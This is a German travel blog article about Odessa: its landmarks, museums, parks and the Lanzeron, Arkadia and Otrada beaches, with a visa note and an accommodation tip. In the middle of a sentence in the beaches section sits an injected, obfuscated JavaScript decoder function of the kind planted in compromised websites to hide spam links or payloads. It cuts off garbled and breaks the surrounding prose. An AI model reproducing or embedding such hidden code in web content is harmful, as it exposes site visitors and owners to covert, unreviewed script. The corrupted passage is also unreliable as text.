Odessa – Die ukrainische Schwarzmeer-Metropole

In der Ukraine befinde sich die Stadt Odessa, welche rund eine Million Einwohner zählt. Sie ist die wichtigste Hafenstadt des Landes und liegt direkt am wunderschönen Schwarzen Meer. Das Wahrzeichen der ukrainischen Schwarzmeer Metrolpole ist die Potemkinsche Treppe. Sie führt von der Altstadt direkt zum Hafen, wo auch die Kanone des englischen Schiffs Tigris steht, welches während des Krimkrieges sank.

Potemkinsche Treppe in OdessaDie Potemkinsche Treppe in Odessa (Foto: © Helga Ewert / pixelio.de)

Ein Highlight, dass man sich nicht entgehen lassen sollte, sind die wunderbar anzusehenden Ballett- und Opernaufführungen im Opernhaus Odessa. Eine weitere Sehenswürdigkeit bietet sich mit dem Haus der Wissenschaftler. Auch mehrere Theater und das Rathaus sind eine begehrte Anlaufstelle. Auf dem Hochufer der Hafenbucht wurden die Denkmale des Dichters Alexander Sergejewitsch Puschkin und auch des Herzogs von Richelieu, am oberen Ende der Potemkinschen Treppe, errichtet. Gerne besucht sind weiterhin der Goldjunge und das Matrosendenkmal. Sagenhafte 2000 Denkmale gibt es in dieser Stadt. Auch zahlreiche Klöster und Kirchen schmücken Odessa, die Deutsche Evangelisch-Lutherische Kirche St. Paul, die Kirche des heiligen Panthelemon, die Kirche der Heiligen Muttergottes, das Frauenkloster Erzengel Michael.

Beim Shoppen und Einkehren in Gastlichkeiten wird jeder schnell feststellen, dass die Preise hier angemessen sind. Für Kunstliebhaber ist ein Besuch im Heimatkundemuseum, im Archäologischen Museum oder im Puschkin-Museum unabdingbar. Aber Odessa besticht auch durch die wundervollen Parkanlagen, wie den Stadtpark, den Park des Sieges, den Botanischen Garten oder den Zoologischen Garten.

Badestrände in Odessa

Im Norden und Süden von Odessa verteilen sich etliche function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand">Strände. Hier ist eine kleine Orientierungshilfe:

Lanzeron Strand
Der Lanzeron Strand ist sehr zentral in Odessa gelegen. Da der Strand in ca. 15 Minuten zu Fuss von der Deribasovskaya Straße erreichbar ist, ist er bei Touristen sehr beliebt. In umittelbarer Nähe liegt der Schevchenko Park, der gerade an warmen Sommertagen einen Besuch wert ist.

Arkadia Strand
Der Arkadia Strand ist der bliebteste Strand in Odessa. Er ist mit dem Auto oder dem Bus in ca. 15 Minuten vom Zentrum aus zu erreichen. Die zahlreichen Diskotheken entlang der Strandpromenade machen ihn auch zu einem beliebten Ziel für Partyhungrige.

Otrada Strand
Der Otrada Strand besteht aus mehreren kleinen, größtenteil privatisierten Stränden und grenzt an den Delfin Strand und an den Langeron Stand. Ein besonderes Highlight ist die Seilbahn, mit der man den Strand bequem erreichen kann.

Hinweis: Seit dem 01.09.2005 können Deutsche übrigens visumsfrei in die Ukraine einreisen, solange der Aufenthalt nicht 90 Tage übersteigt. Damit steht einer Reise zu der sehr interessanten Hafenstadt Odessa nichts mehr im Weg.

Und noch ein Tipp für eine günstige Unterkunft: Bei 9flats gibt es mittlerweile einige echt hübsche Wohnungen von Privatpersonen zur Miete!

Hinterlasse jetzt einen Kommentar

Kommentar hinterlassen

E-Mail Adresse wird nicht veröffentlicht.


*


This Blog will give regular Commentators DoFollow Status. Implemented from IT Blögg